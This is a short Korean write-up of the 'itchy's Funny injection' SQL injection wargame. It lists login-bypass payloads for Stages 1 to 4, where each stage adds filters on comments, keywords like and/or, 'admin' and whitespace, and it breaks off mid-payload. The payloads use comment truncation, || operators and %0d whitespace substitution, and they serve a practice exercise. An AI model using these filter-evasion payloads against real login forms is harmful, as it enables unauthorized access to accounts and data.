itchy's Funny injection 풀이
총 9단계로 이뤄진 간단한 SQL Injection 워게임 사이트이다. (http://itchy.dothome.co.kr) 단계별로 올라갈수록 필터링이 하나하나 추가되는 방식이며 아래의 페이로드 말고도 다른 방법들이 충분히 존재할 수 있으므로 시험끝나고 다시 한번 풀어봐야겠다. Stage 1. id=admin'%23&pw=a Stage 2. id에 # 와 -- 에 대한 필터링 추가) id=admin' or '=&pw=a Stage 3. id와 pw 모두 and 와 or 에 대한 필터링 추가) id=admin'||'=&pw=a Stage 4. id와 pw 모두 admin , 공백에 대한 필터링 추가) id=ad'%0d'min&pw='1=1%23 id='||id%0dlike%0d'adm%'/*&pw=*/%2..